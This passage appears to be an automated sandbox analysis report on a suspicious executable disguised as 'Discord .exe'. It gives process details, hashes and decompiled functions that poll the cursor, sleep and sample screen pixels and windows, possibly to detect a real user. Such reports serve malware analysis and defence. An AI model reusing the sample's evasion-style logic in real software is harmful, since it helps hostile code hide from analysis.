Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: WmiPrvSE.exePID: 5340, Parent PID: 804

General

Target ID:	15
Start time:	19:59:40
Start date:	04/11/2022
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff60f050000
File size:	488448 bytes
MD5 hash:	A782A4ED336750D10B3CAF776AFE8E70
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: Discord .exePID: 5428, Parent PID: 5340

General

Target ID:	16
Start time:	19:59:40
Start date:	04/11/2022
Path:	C:\Users\user\Service\Discord .exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Service\Discord .exe
Imagebase:	0x400000
File size:	312080 bytes
MD5 hash:	2BC22E2E79238D57504BD3720C240533
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Discord .exePID: 2788, Parent PID: 3320COMMON

Non-executed Functions

Function 6DE86370 Relevance: 159.0, APIs: 87, Strings: 3, Instructions: 1488windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 6DE863A7
_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE8645F
_Z10SeuilColorSsR8ColorMaxd.DFO1 ref: 6DE86484
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE8649B
_ZNKSs7compareEPKc.LIBSTDC++-6 ref: 6DE86584
_Z6CEchapP6HWND__.DFO1 ref: 6DE8659C
GdipDisposeImage.GDIPLUS ref: 6DE865DC
GdipFree.GDIPLUS ref: 6DE865E7
_Z6Decre1P6HWND__ii.DFO1 ref: 6DE86639
GdipBitmapGetPixel.GDIPLUS ref: 6DE86736

Strings

2, xrefs: 6DE86FF6
`m, xrefs: 6DE8657F
|m, xrefs: 6DE8639C

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Gdip$Color$BitmapD__iiDecre1DisposeEchapFreeImageM_disposeMaxdPixelRectRep10_SeuilSs4_Ss7compareWindow
String ID: 2$`m$|m
API String ID: 4284821810-3555880318
Opcode ID: a528133022c4ba12cc4e9b6886ca1fd1eeed5e648360933a4700481fa4f8a426
Instruction ID: 833898994833dfe175389220f9c6cd8a10a2ef9e11db4ccdd10e14bd084de5d9
Opcode Fuzzy Hash: a528133022c4ba12cc4e9b6886ca1fd1eeed5e648360933a4700481fa4f8a426
Instruction Fuzzy Hash: 2AE292B0E05619CFCB14AF68C94879CB7F0FB45314F2185DAC85DA7295EB309A99CF82

Uniqueness

Uniqueness Score: -1.00%

Function 6DE83BD0 Relevance: 94.3, APIs: 52, Strings: 1, Instructions: 1539COMMON

Download Yara Rule

APIs

rand.MSVCRT ref: 6DE83C0E
rand.MSVCRT ref: 6DE83C3E
rand.MSVCRT ref: 6DE83C60
_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE83D61
_Z10SeuilColorSsR8ColorMaxd.DFO1 ref: 6DE83D86

Strings

gfff, xrefs: 6DE83C13

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: rand$Color$MaxdSeuil
String ID: gfff
API String ID: 171880793-1553575800
Opcode ID: 56b2d7965b67521acc62718a1cc1aaa4b1ceba7390b46c0d269f6b35a4738e07
Instruction ID: cac9628af62cd8f87597d99986b57d30c74999d312b01986538e9b67510cee4e
Opcode Fuzzy Hash: 56b2d7965b67521acc62718a1cc1aaa4b1ceba7390b46c0d269f6b35a4738e07
Instruction Fuzzy Hash: 76E235B0A0D781CFD721AF25C54439ABBF0FB89754F218D1EE8C996295EB358494CB83

Uniqueness

Uniqueness Score: -1.00%

Function 6DE85DC0 Relevance: 61.6, APIs: 26, Strings: 9, Instructions: 372
sleepwindowCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E6DE85DC0(intOrPtr _a4, intOrPtr _a8) {
				void* _v16;
				struct tagPOINT _v36;
				struct tagPOINT _v44;
				char _v48;
				char _v52;
				unsigned int _v56;
				unsigned int _v60;
				char _v61;
				void* _v78;
				short _v80;
				unsigned int _v84;
				unsigned int _v92;
				long long _v100;
				unsigned int _v108;
				long long _v116;
				long long _v124;
				unsigned int _v128;
				long _v132;
				long long _v140;
				unsigned int _v144;
				unsigned int* _v176;
				unsigned int _v180;
				unsigned int _v184;
				char* _v188;
				unsigned int* _v192;
				unsigned int _v196;
				unsigned int _v200;
				long _t108;
				long _t109;
				void* _t111;
				intOrPtr* _t114;
				intOrPtr* _t118;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr _t129;
				intOrPtr* _t133;
				unsigned int _t137;
				unsigned int _t139;
				unsigned int _t140;
				unsigned int _t141;
				unsigned int _t142;
				unsigned int _t143;
				unsigned int _t144;
				unsigned int _t145;
				unsigned int _t146;
				unsigned int _t147;
				unsigned int _t148;
				long _t166;
				unsigned int _t172;
				intOrPtr _t175;
				unsigned int _t176;
				unsigned int _t178;
				unsigned int _t179;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t189;
				unsigned int* _t196;
				unsigned int _t203;
				long long _t220;
				long long _t226;
				unsigned int _t230;

				_t186 = _t185 - 0xac;
				_v60 = 0xff000000;
				_v56 = 0xff000000;
				asm("fsubr qword [0x6de9e7a0]");
				_v116 = st0;
				asm("fsubr qword [0x6de9e798]");
				asm("fdivrp st2, st0");
				_t220 = st1;
				_v100 = _t220;
				asm("fmulp st1, st0");
				_v140 = _t220;
				do {
					_t142 =  *0x6de9e8dc;
					if(_t142 != 0) {
						_t118 =  *((intOrPtr*)( *_t142 + 4));
						if(_t118 != E6DE93BE0) {
							 *_t118();
						} else {
							 *_t142 = 0x6de98988;
							_v188 =  *((intOrPtr*)(_t142 + 4));
							L6DE8DC30();
							_v192 = _t142;
							L6DE8DC48();
							_t186 = _t186;
						}
					}
					_t143 =  *0x6de9e8e0;
					if(_t143 != 0) {
						_t114 =  *((intOrPtr*)( *_t143 + 4));
						if(_t114 != E6DE93BE0) {
							 *_t114();
						} else {
							 *_t143 = 0x6de98988;
							_v188 =  *((intOrPtr*)(_t143 + 4));
							L6DE8DC30();
							_v192 = _t143;
							L6DE8DC48();
							_t186 = _t186;
						}
					}
					asm("fnstcw word [ebp-0x4a]");
					_v80 = 0xc;
					asm("fldcw word [ebp-0x4c]");
					asm("fistp dword [esp+0x4]");
					asm("fldcw word [ebp-0x4a]");
					asm("fldcw word [ebp-0x4c]");
					asm("fistp dword [esp]");
					asm("fldcw word [ebp-0x4a]");
					L6DE8DC88();
					 *0x6de9e8e0 = 0xc;
					GetCursorPos( &_v44);
					_v132 = 0;
					_t187 = _t186 - 4;
					_v144 = 0;
					_v128 = 0;
					do {
						_v128 = _v128 + 1;
						_t176 = 0;
						Sleep( *0x6de9e820 * 0x3e8);
						asm("fnstcw word [ebp-0x4a]");
						_v80 = 0xc;
						asm("fldcw word [ebp-0x4c]");
						asm("fistp dword [esp+0x4]");
						asm("fldcw word [ebp-0x4a]");
						asm("fldcw word [ebp-0x4c]");
						asm("fistp dword [esp]");
						asm("fldcw word [ebp-0x4a]");
						L6DE8DC88();
						_v188 = 0x3e8;
						 *0x6de9e8dc = 0xc;
						Sleep(??);
						asm("fldz");
						_t189 = _t187;
						_t226 = _v116;
						asm("fucomip st0, st1");
						st0 = _t226;
						asm("fst qword [ebp-0x68]");
						_v124 = _t226;
						if(0 <= 0) {
							L26:
							GetCursorPos( &_v36);
							_t187 = _t189 - 4;
							_t230 = _v108;
							asm("fxch st0, st1");
							asm("fucomi st0, st1");
							st1 = _t230;
							if(_t203 > 0) {
								_v92 = _t230;
								L6DE8DC80();
								_t108 = _v44.x;
								_t166 = _v36.x;
								__eflags = _t108 + 0x13 - _t166;
								if(_t108 + 0x13 < _t166) {
									L47:
									_t144 =  *0x6de9e8e0;
									_t109 = _v36.x;
									__eflags = _t144;
									_v44.x = _t109;
									_v44.y = _v36.y;
									if(_t144 != 0) {
										_t127 =  *((intOrPtr*)( *_t144 + 4));
										__eflags = _t127 - E6DE93BE0;
										if(_t127 != E6DE93BE0) {
											_t109 =  *_t127();
										} else {
											_t109 =  *(_t144 + 4);
											 *_t144 = 0x6de98988;
											_v188 = _t109;
											L6DE8DC30();
											_v192 = _t144;
											L6DE8DC48();
											_t187 = _t187;
										}
									}
									_t145 =  *0x6de9e8dc;
									 *0x6de9e8e0 = _t145;
									break;
								}
								__eflags = _t166 - _t108 - 0x13;
								if(_t166 < _t108 - 0x13) {
									goto L47;
								}
								_t129 = _v44.y;
								_t175 = _v36.y;
								__eflags = _t129 + 0x13 - _t175;
								if(__eflags < 0) {
									goto L47;
								}
								asm("fxch st0, st1");
								asm("fucomip st0, st1");
								st0 = _v92;
								if(__eflags <= 0) {
									goto L47;
								}
								__eflags = _t175 - _t129 - 0x13;
								if(_t175 < _t129 - 0x13) {
									goto L47;
								}
								_v144 = _v144 + 1;
								L28:
								_t147 =  *0x6de9e8e0;
								_v44.x = _v36.x;
								_v44.y = _v36.y;
								if(_t147 != 0) {
									_t133 =  *((intOrPtr*)( *_t147 + 4));
									if(_t133 != E6DE93BE0) {
										 *_t133();
									} else {
										 *_t147 = 0x6de98988;
										_v188 =  *((intOrPtr*)(_t147 + 4));
										L6DE8DC30();
										_v192 = _t147;
										L6DE8DC48();
										_t187 = _t187;
									}
								}
								_t109 = _v132;
								_t145 =  *0x6de9e8dc;
								 *0x6de9e8e0 = _t145;
								if(_t109 >= _a4) {
									break;
								} else {
									goto L32;
								}
							}
							st0 = _t230;
							goto L28;
						} else {
							do {
								_t148 = 0;
								asm("fldz");
								asm("fucomip st0, st1");
								st0 = _v100;
								if(0 > 0) {
									do {
										_t178 =  *0x6de9e8e0;
										_v180 = _t148;
										_v184 = _t176;
										_v176 =  &_v60;
										_t137 =  *(_t178 + 4);
										_v188 = _t137;
										L6DE8DC50();
										_t196 = _t189 - 0x10;
										__eflags = _t137;
										if(_t137 != 0) {
											 *(_t178 + 8) = _t137;
										}
										_t179 =  *0x6de9e8dc;
										_v196 = _t148;
										_v200 = _t176;
										_v192 =  &_v56;
										_t139 =  *(_t179 + 4);
										 *_t196 = _t139;
										L6DE8DC50();
										_t189 = _t196 - 0x10;
										__eflags = _t139;
										if(_t139 != 0) {
											 *(_t179 + 8) = _t139;
										}
										_t140 = _v60;
										_v92 = _t140;
										_t141 = _v56;
										_t172 = _t141 >> 0x10;
										__eflags = _t172 - _t140 >> 0x10;
										if(_t172 == _t140 >> 0x10) {
											_v84 = _v92 >> 8;
											__eflags = _v84 - _t141 >> 8;
											if(_v84 == _t141 >> 8) {
												__eflags = _v92 - _t141;
												if(_v92 == _t141) {
													_v124 = _v124 +  *0x6de98148;
												}
											}
										}
										__eflags = _t172;
										if(_t172 == 0) {
											__eflags = _t141 >> 8;
											if(_t141 >> 8 == 0) {
												__eflags = _t141 - 3;
												if(_t141 <= 3) {
													_v108 = _v108 +  *0x6de98148;
												}
											}
										}
										_t148 = _t148 + 1;
										__eflags = _t148;
										_v92 = _t148;
										asm("fild dword [ebp-0x58]");
										asm("fucomip st0, st1");
										st0 = _v100;
									} while (_t148 > 0);
								} else {
								}
								_t176 = _t176 + 1;
								_t203 = _t176;
								_v92 = _t176;
								asm("fild dword [ebp-0x58]");
								asm("fucomip st0, st1");
								st0 = _v116;
							} while (_t203 > 0);
							goto L26;
						}
						L32:
						_t109 = _t109 + 0x1e;
						_v132 = _t109;
					} while (_v128 != 0x78);
					if(_t145 != 0) {
						_t125 =  *((intOrPtr*)( *_t145 + 4));
						if(_t125 != E6DE93BE0) {
							_t109 =  *_t125();
						} else {
							_t109 =  *(_t145 + 4);
							 *_t145 = 0x6de98988;
							_v188 = _t109;
							L6DE8DC30();
							_v192 = _t145;
							L6DE8DC48();
							_t187 = _t187;
						}
					}
					_v188 = "rien";
					 *0x6de9e8e0 = 0;
					 *0x6de9e8dc = 0;
					L6DE8DD68();
					_t186 = _t187 - 4;
					if(_t109 == 0) {
						_t146 =  &_v52;
						_v192 = _t146;
						L6DE8DC90();
						_v192 = "none";
						L6DE8DD68();
						_t186 = _t186 - 4;
						__eflags = _t109;
						if(_t109 != 0) {
							_v196 = _t146;
							L6DE8DD58();
							_t186 = _t186 - 4;
							_v180 = 0x6de9e75c;
							_v184 = 0x6de9e838;
							_v188 = 0x6de9e83c;
							_v192 = 0x6de9e840;
							_v196 = 0x6de9e858;
							_v200 =  &_v48;
							L6DE8DC98();
							asm("lock xadd [eax-0x4], edx");
							__eflags = 0xffffffff;
							if(0xffffffff <= 0) {
								_v200 =  &_v61;
								L6DE8DD30();
								_t186 = _t186 - 4;
							}
						}
						asm("lock xadd [eax-0x4], edx");
						__eflags = 0xffffffff;
						if(0xffffffff <= 0) {
							_v196 =  &_v48;
							L6DE8DD30();
							_t186 = _t186 - 4;
						}
					}
					if(_v128 == _v144) {
						_t111 = 1;
						L55:
						return _t111;
					}
				} while (_a8 == 0);
				_t111 = 0;
				goto L55;
			}

0x6de85dc6
0x6de85dcc
0x6de85dd3
0x6de85de2
0x6de85df2
0x6de85df7
0x6de85e03
0x6de85e05
0x6de85e07
0x6de85e0a
0x6de85e0c
0x6de85e12
0x6de85e12
0x6de85e1a
0x6de85e1e
0x6de85e26
0x6de86230
0x6de85e2c
0x6de85e2f
0x6de85e35
0x6de85e38
0x6de85e40
0x6de85e43
0x6de85e48
0x6de85e48
0x6de85e26
0x6de85e4b
0x6de85e53
0x6de85e57
0x6de85e5f
0x6de86239
0x6de85e65
0x6de85e68
0x6de85e6e
0x6de85e71
0x6de85e79
0x6de85e7c
0x6de85e81
0x6de85e81
0x6de85e5f
0x6de85e84
0x6de85e93
0x6de85e97
0x6de85e9a
0x6de85e9e
0x6de85ea7
0x6de85eaa
0x6de85ead
0x6de85eb0
0x6de85eb5
0x6de85ec0
0x6de85ec6
0x6de85ecd
0x6de85ed0
0x6de85eda
0x6de85ee1
0x6de85eeb
0x6de85eef
0x6de85ef4
0x6de85efa
0x6de85f0c
0x6de85f10
0x6de85f13
0x6de85f17
0x6de85f20
0x6de85f23
0x6de85f26
0x6de85f29
0x6de85f2e
0x6de85f35
0x6de85f3a
0x6de85f40
0x6de85f42
0x6de85f47
0x6de85f4a
0x6de85f4c
0x6de85f4e
0x6de85f51
0x6de85f54
0x6de86066
0x6de8606c
0x6de86078
0x6de86087
0x6de8608a
0x6de8608c
0x6de8608e
0x6de86090
0x6de86185
0x6de86188
0x6de8618d
0x6de86190
0x6de86196
0x6de86198
0x6de861d8
0x6de861d8
0x6de861de
0x6de861e4
0x6de861e6
0x6de861e9
0x6de861ec
0x6de861f0
0x6de861f3
0x6de861f8
0x6de8632a
0x6de861fe
0x6de861fe
0x6de86201
0x6de86207
0x6de8620a
0x6de86212
0x6de86215
0x6de8621a
0x6de8621a
0x6de861f8
0x6de8621d
0x6de86223
0x00000000
0x6de86223
0x6de8619d
0x6de8619f
0x00000000
0x00000000
0x6de861a1
0x6de861a4
0x6de861aa
0x6de861ac
0x00000000
0x00000000
0x6de861b4
0x6de861b6
0x6de861b8
0x6de861ba
0x00000000
0x00000000
0x6de861bf
0x6de861c1
0x00000000
0x00000000
0x6de861c3
0x6de86098
0x6de86098
0x6de860a6
0x6de860a9
0x6de860ac
0x6de860b0
0x6de860b8
0x6de861d1
0x6de860be
0x6de860c1
0x6de860c7
0x6de860ca
0x6de860d2
0x6de860d5
0x6de860da
0x6de860da
0x6de860b8
0x6de860dd
0x6de860e3
0x6de860e9
0x6de860ef
0x00000000
0x00000000
0x00000000
0x00000000
0x6de860ef
0x6de86096
0x00000000
0x6de85f60
0x6de85f60
0x6de85f60
0x6de85f62
0x6de85f67
0x6de85f69
0x6de85f6b
0x6de85fa6
0x6de85fa6
0x6de85faf
0x6de85fb3
0x6de85fb7
0x6de85fbb
0x6de85fbe
0x6de85fc1
0x6de85fc6
0x6de85fc9
0x6de85fcb
0x6de85fcd
0x6de85fcd
0x6de85fd0
0x6de85fd9
0x6de85fdd
0x6de85fe1
0x6de85fe5
0x6de85fe8
0x6de85feb
0x6de85ff0
0x6de85ff3
0x6de85ff5
0x6de85ff7
0x6de85ff7
0x6de85ffa
0x6de85fff
0x6de86002
0x6de8600e
0x6de86011
0x6de86013
0x6de86024
0x6de86029
0x6de8602c
0x6de86032
0x6de86035
0x6de86044
0x6de86044
0x6de86035
0x6de8602c
0x6de85f72
0x6de85f74
0x6de85f7b
0x6de85f7d
0x6de85f7f
0x6de85f81
0x6de85f8c
0x6de85f8c
0x6de85f81
0x6de85f7d
0x6de85f90
0x6de85f90
0x6de85f93
0x6de85f96
0x6de85f9c
0x6de85f9e
0x6de85f9e
0x00000000
0x6de85f6d
0x6de86050
0x6de86050
0x6de86053
0x6de86056
0x6de8605c
0x6de8605e
0x6de8605e
0x00000000
0x6de85f60
0x6de860f1
0x6de860f1
0x6de860f8
0x6de860f8
0x6de86103
0x6de86107
0x6de8610f
0x6de86242
0x6de86115
0x6de86115
0x6de86118
0x6de8611e
0x6de86121
0x6de86129
0x6de8612c
0x6de86131
0x6de86131
0x6de8610f
0x6de86134
0x6de86140
0x6de8614a
0x6de86154
0x6de86159
0x6de8615e
0x6de86260
0x6de86263
0x6de86266
0x6de8626b
0x6de86274
0x6de86279
0x6de8627c
0x6de8627e
0x6de86283
0x6de86288
0x6de8628d
0x6de86290
0x6de86298
0x6de862a0
0x6de862a8
0x6de862b0
0x6de862b8
0x6de862bb
0x6de862c8
0x6de862cd
0x6de862cf
0x6de86337
0x6de8633a
0x6de8633f
0x6de8633f
0x6de862cf
0x6de862d9
0x6de862de
0x6de862e0
0x6de862ec
0x6de862ef
0x6de862f4
0x6de862f4
0x6de862e0
0x6de8616d
0x6de86249
0x6de8624e
0x6de86255
0x6de86255
0x6de86176
0x6de8617e
0x00000000

APIs

GdipDisposeImage.GDIPLUS ref: 6DE85E38
GdipFree.GDIPLUS ref: 6DE85E43
GdipDisposeImage.GDIPLUS ref: 6DE85E71
GdipFree.GDIPLUS ref: 6DE85E7C
_Z5Decreii.DFO1 ref: 6DE85EB0
GetCursorPos.USER32 ref: 6DE85EC0
Sleep.KERNEL32 ref: 6DE85EF4
_Z5Decreii.DFO1 ref: 6DE85F29
Sleep.KERNEL32 ref: 6DE85F3A
GdipBitmapGetPixel.GDIPLUS ref: 6DE85FC1
GdipBitmapGetPixel.GDIPLUS ref: 6DE85FEB
GetCursorPos.USER32 ref: 6DE8606C

Strings

Xm, xrefs: 6DE86173
Xm, xrefs: 6DE862B0
<m, xrefs: 6DE862A0
x, xrefs: 6DE860F4
\m, xrefs: 6DE86290
@m, xrefs: 6DE862A8
@m, xrefs: 6DE8613B
Xm, xrefs: 6DE8624E
8m, xrefs: 6DE86298

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Gdip$BitmapCursorDecreiiDisposeFreeImagePixelSleep
String ID: 8m$<m$@m$@m$Xm$Xm$Xm$\m$x
API String ID: 1970598588-396972373
Opcode ID: a7d97d3a432d44c81a68fc3297d46301f6fc45eb7777dae363d8e799adf3f85d
Instruction ID: 017a1f8e2cb9cc6188f63fb4aeda7b5d5d1ed8b6e8b8ca562a4b2bc7dcc70e6b
Opcode Fuzzy Hash: a7d97d3a432d44c81a68fc3297d46301f6fc45eb7777dae363d8e799adf3f85d
Instruction Fuzzy Hash: 32E19EB0D09609CFDF10AFA5C58869CBBF0FF45304F21486ED899AB356EB319855CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8A200 Relevance: 52.9, APIs: 35, Instructions: 440
processstringwindowCOMMON

Download Yara Rule

C-Code - Quality: 18%

			E6DE8A200() {
				intOrPtr _v324;
				char _v348;
				char _v372;
				char _v376;
				intOrPtr _v620;
				int _v624;
				void* _v638;
				char _v640;
				int _v644;
				char _v648;
				char _v652;
				void* _v658;
				void* _v660;
				int _v664;
				int _v668;
				char _v672;
				char _v676;
				int _v680;
				char _v684;
				int _v688;
				char _v692;
				char _v696;
				int _v700;
				struct HWND__* _v704;
				int _v708;
				void** _v712;
				void* _v716;
				int _v720;
				void* _v724;
				char _v728;
				char _v732;
				struct HWND__* _v736;
				char _t108;
				struct HWND__* _t110;
				void* _t113;
				char _t122;
				struct HWND__* _t124;
				void* _t126;
				void* _t131;
				void* _t132;
				void* _t134;
				int _t135;
				void* _t138;
				int _t140;
				int _t145;
				int _t147;
				int _t154;
				struct HWND__* _t156;
				int _t164;
				struct HWND__** _t173;
				struct HWND__** _t174;
				char _t186;
				intOrPtr _t187;
				int _t198;
				char _t199;
				char* _t201;
				char* _t202;
				void* _t203;
				struct HWND__** _t204;
				int _t205;
				struct HWND__** _t210;
				void* _t213;
				int _t214;
				struct HWND__* _t217;
				int _t220;
				char _t221;
				signed int _t223;
				void* _t224;
				void* _t225;
				struct HWND__** _t228;
				void* _t229;
				void* _t230;
				struct HWND__** _t231;
				void* _t232;
				void* _t233;
				struct HWND__* _t235;
				intOrPtr _t236;
				intOrPtr _t237;
				void* _t238;
				struct HWND__* _t239;
				intOrPtr* _t240;
				intOrPtr* _t241;
				void* _t242;
				void* _t244;
				void* _t246;
				void* _t248;
				void* _t251;
				void* _t254;
				void* _t258;

				ResetEvent( *0x6de9e8bc);
				_t244 = _t242 - 0x288;
				 *0x6de9e760 = 0;
				asm("fnstcw word [esp+0x1e]");
				_v624 = 0;
				_v620 = 0x128;
				_v324 = 0x128;
				 *0x6de9e88c = 0;
				_v640 = 0xc;
				asm("fldcw word [esp+0x1c]");
				asm("fistp dword [0x6de9e890]");
				asm("fldcw word [esp+0x1e]");
				if( *0x6de9e7f4 -  *0x6de9e7f0 >> 2 != 0) {
					_t229 = 0;
					_v668 =  *0x6de9e88c;
					_v664 =  *0x6de9e890;
					_v648 = WindowFromPoint;
					_t108 = WindowFromPoint(??);
					_t220 = WindowFromPoint;
					_v676 = _t108;
					_v672 = 3;
					_v652 = GetAncestor;
					_t110 = GetAncestor(??, ??);
					_t244 = _t244;
					_v640 = _t110;
					_t201 =  &_v640;
					_v668 = Sleep;
					while(1) {
						_t236 =  *0x6de9e7f4;
						_v672 = 0;
						_t113 = E6DE95380( *0x6de9e7f0, _t236, _t201);
						if(_t229 == 0xa || _t236 != _t113) {
							goto L2;
						}
						_t229 = _t229 + 1;
						_v684 = _v640;
						L6DE8DC70();
						_v680 = _t220;
						_v684 = _v640;
						L6DE8DC60();
						_t241 = _v668;
						_v684 = 0x32;
						 *_t241();
						_v684 = _t220;
						_v688 = _v644;
						L6DE8DC68();
						_v688 = 0x32;
						 *_t241();
						_v688 = _t220;
						_v692 = _v648;
						L6DE8DCD8();
						_v692 = 0x32;
						 *_t241();
						_v692 = _t220;
						_v696 = _v652;
						L6DE8DC68();
						_v696 = 0x32;
						 *_t241();
						_v696 =  *0x6de9e890;
						_v700 =  *0x6de9e88c;
						_t198 = _v680();
						_t220 = _t198;
						_v704 = 3;
						_v708 = _t198;
						_t199 = _v684();
						_t244 = _t244 - 0xffffffffffffffe8;
						_v672 = _t199;
					}
				} else {
					_v652 = Sleep;
				}
				L2:
				_v684 = 0x3e8;
				_v668();
				_t246 = _t244 - 4;
				asm("fnstcw word [esp+0x1e]");
				_v660 = 0xc;
				asm("fldcw word [esp+0x1c]");
				asm("fistp dword [0x6de9e88c]");
				asm("fldcw word [esp+0x1e]");
				asm("fldcw word [esp+0x1c]");
				asm("fistp dword [0x6de9e890]");
				asm("fldcw word [esp+0x1e]");
				if( *0x6de9e7f4 -  *0x6de9e7f0 >> 2 != 0) {
					_t230 = 0;
					_v688 =  *0x6de9e88c;
					_v684 =  *0x6de9e890;
					_v668 = WindowFromPoint;
					_t122 = WindowFromPoint(??);
					_t221 = WindowFromPoint;
					_v696 = _t122;
					_v692 = 3;
					_v672 = GetAncestor;
					_t124 = GetAncestor(??, ??);
					_t246 = _t246;
					_t202 =  &_v660;
					_v660 = _t124;
					while(1) {
						_t237 =  *0x6de9e7f4;
						_v692 = 0;
						_t126 = E6DE95380( *0x6de9e7f0, _t237, _t202);
						if(_t230 == 0xa || _t237 != _t126) {
							break;
						}
						_t230 = _t230 + 1;
						_v704 = _v660;
						L6DE8DC70();
						_v700 = _t221;
						_v704 = _v660;
						L6DE8DC60();
						_t240 = _v688;
						_v704 = 0x32;
						 *_t240();
						_v704 = _t221;
						_v708 = _v664;
						L6DE8DC68();
						_v708 = 0x32;
						 *_t240();
						_v708 = _t221;
						_v712 = _v668;
						L6DE8DCD8();
						_v712 = 0x32;
						 *_t240();
						_v712 = _t221;
						_v716 = _v672;
						L6DE8DC68();
						_v716 = 0x32;
						 *_t240();
						_v716 =  *0x6de9e890;
						_v720 =  *0x6de9e88c;
						_t186 = _v700();
						_t221 = _t186;
						_v724 = 3;
						_v728 = _t186;
						_t187 = _v704();
						_t246 = _t246 - 0xffffffffffffffe8;
						_v692 = _t187;
					}
					 *0x6de9e7f4 =  *0x6de9e7f0;
				}
				_v704 = 0x3e8;
				_v688();
				_t203 =  *0x6de9e7e8;
				_t231 =  *0x6de9e7e4;
				_t248 = _t246 - 4;
				_t223 = _t203 - _t231;
				_t130 = _t223 >> 2;
				if(_t223 >> 2 != 0) {
					if(_t231 == _t203) {
						_t131 = _t203;
						_t224 = _t203;
					} else {
						asm("bsr eax, eax");
						E6DE8A040(_t231, 0x1f - (_t130 ^ 0x0000001f) + 0x1f - (_t130 ^ 0x0000001f), _t203);
						if(_t223 > 0x43) {
							_t228 =  &(_t231[0x10]);
							_v700 = 0;
							E6DE95290(_t231, _t228);
							if(_t203 != _t228) {
								_t235 =  *_t228;
								_t217 =  *(_t228 - 4);
								_t91 = _t228 - 4; // 0x22b86
								_t173 = _t91;
								if(_t217 > _t235) {
									goto L45;
								} else {
									L48:
									_t174 = _t228;
									_t228 =  &(_t228[1]);
									 *_t174 = _t235;
									if(_t203 != _t228) {
										L47:
										_t235 =  *_t228;
										_t217 =  *(_t228 - 4);
										_t96 = _t228 - 4; // 0x22b82
										_t173 = _t96;
										if(_t217 > _t235) {
											while(1) {
												L45:
												_t173[1] = _t217;
												_t217 =  *(_t173 - 4);
												_t94 = _t173 - 4; // 0x22b7e
												_t210 = _t94;
												if(_t235 >= _t217) {
													break;
												}
												_t173 = _t210;
											}
											_t228 =  &(_t228[1]);
											 *_t173 = _t235;
											if(_t203 != _t228) {
												goto L47;
											}
										} else {
											goto L48;
										}
									} else {
									}
								}
							}
						} else {
							_v700 = 0;
							E6DE95290(_t231, _t203);
						}
						_t224 =  *0x6de9e7e8;
						_t131 =  *0x6de9e7e4;
						_t203 = _t224;
					}
					_v700 = 0;
					_t132 = E6DE95320(_t131, _t224);
					_t232 = _t132;
					if(_t132 == _t224) {
						_t233 =  *0x6de9e7e8;
					} else {
						_t213 =  *0x6de9e7e8;
						if(_t224 == _t213) {
							_t214 = _t224 - _t203;
